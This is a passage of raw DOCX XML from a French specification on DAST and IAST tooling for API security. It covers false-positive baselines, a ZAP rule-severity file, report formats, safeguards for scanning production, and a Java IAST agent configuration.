        <w:t xml:space="preserve">Exclusion par code HTTP : ne pas traiter les 400/422 comme des vulnérabilités (comportement métier normal de validation des inputs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Exclusion par paramètre : ne pas fuzzer les paramètres d’audit/trace injectables uniquement en lecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Reclassification de sévérité</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Reclasser MEDIUM → LOW sur des règles spécifiques si le contexte métier le justifie (ex : absence de HSTS sur un endpoint interne non exposé à Internet)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Reclasser HIGH → MEDIUM pour les vulnérabilités sur des endpoints nécessitant un privilège élevé non accessibles sans accès VPN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Règles custom</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Pouvoir écrire ses propres règles de détection (ex : vérifier qu’un header métier propriétaire est présent sur toutes les réponses, ou qu’un champ sensible n’est jamais retourné en clair)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Support de scripts Groovy/Python/YAML selon l’outil (ZAP Automation Framework, StackHawk YAML rules, 42Crunch Security Audit rules)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Baseline de faux positifs persistante</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Les FP requalifiés sont stockés dans un fichier de baseline versionné en Git et chargé à chaque exécution du pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Workflow de triage : Confirmed / False Positive / Accepted Risk / Fixed — avec date et auteur de la requalification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Un FP requalifié ne remonte plus dans les runs suivants sans modification de la règle sous-jacente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DD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Exemple structure baseline ZAP (zap-baseline.conf)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Format: &lt;rule-id&gt; IGNORE/WARN/FAIL &lt;description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">10096 IGNORE  # Timestamp Disclosure - comportement normal de l’API</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">10054 IGNORE  # Cookie Without SameSite - APIs stateless JSON, pas de cookie session</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">90033 WARN    # Loosely Scoped Cookie - accepté sur env intégration uniquement</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">40018 FAIL    # SQL Injection - toujours bloquant</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">40012 FAIL    # XSS - bloquant uniquement sur endpoints HTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2.4   Templates de rapport personnalisables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226"/>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Usage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Contenu attendu</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Personnalisation</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SARIF</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GitLab Security Dashboard</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Findings structurés avec règle, emplacement, sévérité, CWE</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Filtrage par seuil de sévérité</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JSON brut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VOC / SIEM / SDepend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Tous les findings avec contexte complet (request/response)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Export filtré par endpoint ou tag</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HTML/PDF</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CSIRT / RSSI / Audit</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Rapport lisible, exécutif + technique, findings classés</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Logo, classification C2 Restreint, contexte projet, date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CSV</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Suivi qualité / tableur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Liste flat des findings pour consolidation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Colonnes configurables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Différentiel</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Suivi régression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Nouveaux findings vs baseline précédent uniquement</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Période de référence configurable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single" w:color="1E6B3C" w:sz="1"/>
              <w:bottom w:val="single" w:color="1E6B3C" w:sz="1"/>
              <w:right w:val="single" w:color="1E6B3C" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D9EAD3"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Recommandation : exiger un rapport différentiel natif. Sur un pipeline récurrent hebdomadaire, un rapport de 200 findings dont 195 déjà connus est inutilisable. Seuls les 5 nouveaux findings ont de la valeur opérationnelle.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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5   DAST On-Demand — Analyse Technique Détaillée</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5.1   Environnement cible et différences vs CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Le DAST on-demand s’applique sur preprod stabilisée et production, déclenché manuellement ou planifié (hebdomadaire pour les APIs FCI selon RTS 10.2.B). L’environnement est plus sensible : le scan doit être non-intrusif par défaut.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34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 CI/CD Plugin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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 On-Demand</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Déclenchement</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Automatique sur push / MR</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Manuel ou planifié (cron GitLab, scheduler outil)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Environnement</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Staging / Intégration</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Preprod / Production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Mode scan</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Actif complet</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Passif + actif limité (rate limiting strict)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Durée</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5–20 min (gate bloquant)</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30–120 min (reporting asynchrone)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Authentification</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Token CI/CD variable protégée</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Secrets vault (CyberArk, HashiCorp Vault)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Rapport</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SARIF → GitLab Dashboard (temps réel)</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PDF/HTML → CSIRT / RSSI (différé)</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Gate bloquant</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Oui (fail pipeline si CRITICAL)</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Non (alerting uniquement)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Rate limiting</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Configurable (ex : 20 req/s)</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Strict (ex : 5 req/s, délai inter-requêtes)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Circuit breaker</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Timeout strict (20 min)</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Arrêt si taux erreur API &gt; 5% de 503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Plage horaire</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Aucune restriction (env. isolé)</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Configurable (hors heures de pic)</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Couverture FCI</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Endpoints critiques en priorité</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Couverture exhaustive planifiée</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5.2   Contraintes spécifiques On-Demand</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Mode passif en priorité sur production : observation du trafic réel sans envoi de payloads actifs — zéro risque de perturbation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Mode actif avec rate limiting strict : max 5 req/s, délai configurable entre les requêtes (ex : 200 ms minimum)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Circuit breaker obligatoire : arrêt automatique du scan si le taux d’erreur HTTP 5xx dépasse 5% sur une fenêtre de 2 minutes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Plage horaire configurable : exclusion des heures de pic métier (ex : 8h-18h en semaine pour les APIs de paiement)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Exclusion d’endpoints sensibles : blacklister les endpoints de suppression/modification de données en mode on-demand prod (DELETE, PUT sur ressources critiques)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Authentification via vault : les secrets ne transitent pas par les variables GitLab CI — injection directe depuis CyberArk ou HashiCorp Vault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4F24" w:sz="1"/>
              <w:left w:val="single" w:color="7F4F24" w:sz="1"/>
              <w:bottom w:val="single" w:color="7F4F24" w:sz="1"/>
              <w:right w:val="single" w:color="7F4F24" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FCE5CD"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Attention : le DAST on-demand sur production ne doit jamais utiliser de données réelles comme payload d’attaque. Utiliser des tokens de test dédiés, des comptes sandbox, et des IBAN/numéros de carte fictifs (Luhn-valides mais inexistants).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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6   IAST — Analyse Technique Détaillée &amp; Multi-Langages</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6.1   Principe fondamental et positionnement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">L’IAST n’est pas un scanner externe : c’est un agent instrumentant le processus applicatif de l’intérieur. Il observe le flux de données en temps réel pendant l’exécution des tests fonctionnels existants. Il ne nécessite pas de trafic d’attaque dédié : vos tests unitaires et d’intégration deviennent automatiquement des vecteurs de détection de vulnérabilités.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single" w:color="1E6B3C" w:sz="1"/>
              <w:bottom w:val="single" w:color="1E6B3C" w:sz="1"/>
              <w:right w:val="single" w:color="1E6B3C" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D9EAD3"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Avantage structurel : l’IAST génère structurellement moins de faux positifs que le DAST car il observe l’exécution réelle. Si la vulnérabilité n’est pas déclenchée pendant les tests, elle n’est pas reportée. Chaque finding IAST correspond à un chemin d’exécution réellement parcouru.</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6.2   IAST a-t-il besoin du code source ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Non, le code source n’est pas nécessaire au fonctionnement de l’IAST. L’agent instrumentant le bytecode (ou le runtime) de l’application. Mais selon la configuration choisie, le code source apporte des informations supplémentaires :</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3000"/>
        <w:gridCol w:w="2726"/>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Elément</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Obligatoire ?</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Apport si fourni</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Bytecode / runtime applicatif</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Oui (implicite)</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Base de l’instrumentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Application déployée normalement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Code source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Source mapping : ligne exacte où la vuln est détectée dans le code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Monté en volume ou accessible via repo Git</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Fichiers de config (application.yml, .env, web.xml)</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Recommandé</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Détection misconfigurations : debug mode, secrets en clair, endpoints exposés</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Accessibles depuis l’env de test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Dépendances (pom.xml, package.json, requirements.txt...)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Recommandé</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Corrélation CVE libs tierces (IAST + SCA combiné)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Fournis au démarrage de l’agent</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Spéc OpenAPI</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Optionnel</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Couverture des endpoints non atteints par les tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Variable d’environnement agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Configuration recommandée pour le source mapping (exemple Java)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DD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Configuration agent IAST avec source mapping activé</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">JAVA_TOOL_OPTIONS=\</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  -javaagent:/opt/iast/agent.jar \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  -Diast.server.url=$IAST_SERVER_URL \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  -Diast.api.key=$IAST_API_KEY \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  -Diast.application.name=$CI_PROJECT_NAME \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  -Diast.environment=$CI_ENVIRONMENT_NAME \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  -Diast.sourcecode.path=/builds/$CI_PROJECT_PATH/src  # source mapping</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  -Diast.sourcecode.enabled=true</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># En production : source mapping DÉSACTIVÉ</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># -Diast.sourcecode.enabled=false</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Ne jamais monter le code source en production</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6.3   Support multi-langages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
